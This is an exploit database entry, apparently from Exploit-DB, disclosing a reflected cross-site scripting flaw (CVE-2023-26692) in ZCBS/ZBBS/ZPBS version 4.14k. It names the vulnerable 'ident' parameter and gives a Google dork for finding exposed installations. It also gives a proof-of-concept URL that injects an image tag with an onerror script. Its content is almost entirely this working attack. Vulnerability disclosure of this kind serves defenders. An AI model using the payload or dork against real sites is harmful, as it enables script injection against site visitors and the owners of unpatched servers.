Exploits
GHDB
Papers
Shellcodes
Search EDB
SearchSploit Manual
Submissions
Online Training
Stats
About Us
Search
# Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS) # Date: 2023-03-30 # CVE: CVE-2023-26692 # Exploit Author: Abdulaziz Saad (@b4zb0z) # Vendor Homepage: https://www.zcbs.nl # Version: 4.14k # Tested on: LAMP, Ubuntu # Google Dork: inurl:objecten.pl?ident=3D --- [#] Vulnerability : `$_GET['ident']` [#] Exploitation : `https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror= =3Dalert(%22XSS%22)%3E`